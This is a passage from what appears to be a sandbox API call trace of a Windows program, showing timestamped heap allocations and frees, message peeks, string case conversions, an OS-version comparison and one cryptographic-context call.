hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.591] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.592] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0161.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.592] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.592] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0161.592] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.592] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.592] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.592] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0161.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0161.593] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.593] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.593] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.593] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.593] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.593] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0161.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.593] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0161.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.599] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0161.600] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.600] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0161.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0161.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0161.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0161.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.602] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0161.603] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0161.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0161.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.604] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.604] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.605] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.606] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0161.606] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.606] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.606] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 